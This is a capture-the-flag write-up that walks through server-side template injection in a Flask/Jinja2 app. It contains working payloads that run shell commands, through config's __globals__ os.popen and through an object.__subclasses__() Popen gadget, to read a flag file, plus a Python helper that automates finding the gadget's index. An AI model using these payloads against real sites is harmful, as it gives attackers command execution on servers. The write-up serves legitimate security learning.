Requested: GET /invalid -> the 404 response echoes the requested path back: invalid

Verifying if SSTI is possible

Requested: GET /invalid{{7*7}} -> we got invalid49 instead of invalid{{7*7}}, so the path is rendered through a template engine and the expression is evaluated server-side (SSTI confirmed).

We already know the application is Flask with Jinja2 templates, so the well-known Jinja2 SSTI payloads apply.

Getting the flag

Requested: GET /{{config.__class__.__init__.__globals__['os'].popen('cat%20flag.txt').read()}} -> we got the flag

This works because config is Flask's Config object, whose class is defined in a module that imports os; the constructor's __globals__ therefore exposes os, and os.popen() runs the command. %20 is the URL-encoded space in the command.

Alternative

Finding the index of subprocess.Popen in object's subclass list. The index differs per Python version and per set of imported modules, so it has to be located on the target by narrowing the slice (Popen is only present if the target process has imported subprocess):

  1. GET /{{''.__class__.mro()[1].__subclasses__()[100:]}} -> Popen is there in the list
  2. GET /{{''.__class__.mro()[1].__subclasses__()[300:]}} -> Popen is there in the list
  3. GET /{{''.__class__.mro()[1].__subclasses__()[500:]}} -> Internal Server Error
  4. GET /{{''.__class__.mro()[1].__subclasses__()[400:]}} -> Popen is there in the list
  5. GET /{{''.__class__.mro()[1].__subclasses__()[450:]}} -> Popen is NOT there in the list, so the index is in [400, 450)
  6. GET /{{''.__class__.mro()[1].__subclasses__()[414]}} -> Popen exists at index 414 on this target

GET /{{''.__class__.mro()[1].__subclasses__()[414]('cat%20flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

Here ''.__class__.mro()[1] is object, so __subclasses__() lists every class loaded in the process; index 414 is subprocess.Popen on this target, and stdout=-1 is subprocess.PIPE, so communicate()[0] is the command's stdout and the flag is rendered into the page.
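The same probe-and-narrow procedure, written as an added local example (not code from the writeup or the target): popen_in_slice() simulates one GET with a slice, bisect_popen() narrows the slice the way the manual [100:], [300:], [400:], [450:] requests did, and run_via_index() is the final payload. It assumes subprocess has been imported in the interpreter (as it is here via the explicit import), which is also the condition for Popen to show up on a real target; the index it prints will differ from 414 because it depends on the interpreter and its loaded modules.

```python
import subprocess  # Popen only appears in object.__subclasses__() once subprocess is imported


def object_subclasses():
    """''.__class__.mro()[1] is `object`; __subclasses__() lists every class loaded in this process."""
    return ''.__class__.mro()[1].__subclasses__()


def popen_in_slice(start, stop=None):
    """One probe: does GET /{{''.__class__.mro()[1].__subclasses__()[start:stop]}} list subprocess.Popen?"""
    return any(c.__module__ == 'subprocess' and c.__name__ == 'Popen'
               for c in object_subclasses()[start:stop])


def bisect_popen():
    """Narrow [lo, hi) until a single index is left, mirroring the manual slice requests."""
    lo, hi = 0, len(object_subclasses())
    if not popen_in_slice(lo, hi):
        return None  # subprocess never imported: this gadget is unavailable
    while hi - lo > 1:  # invariant: Popen lies in subclasses[lo:hi]
        mid = (lo + hi) // 2
        if popen_in_slice(mid, hi):
            lo = mid
        else:
            hi = mid
    return lo


def run_via_index(idx, cmd):
    """Equivalent of the final payload; stdout=-1 is subprocess.PIPE."""
    cls = object_subclasses()[idx]
    return cls(cmd, shell=True, stdout=-1).communicate()[0].strip()


if __name__ == '__main__':
    idx = bisect_popen()
    print('subprocess.Popen index in this interpreter:', idx)
    print(run_via_index(idx, 'echo hello'))
```

Each probe costs one request, so the binary search above needs roughly log2(number of loaded classes) requests, versus the six hand-picked slices in the writeup.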

References: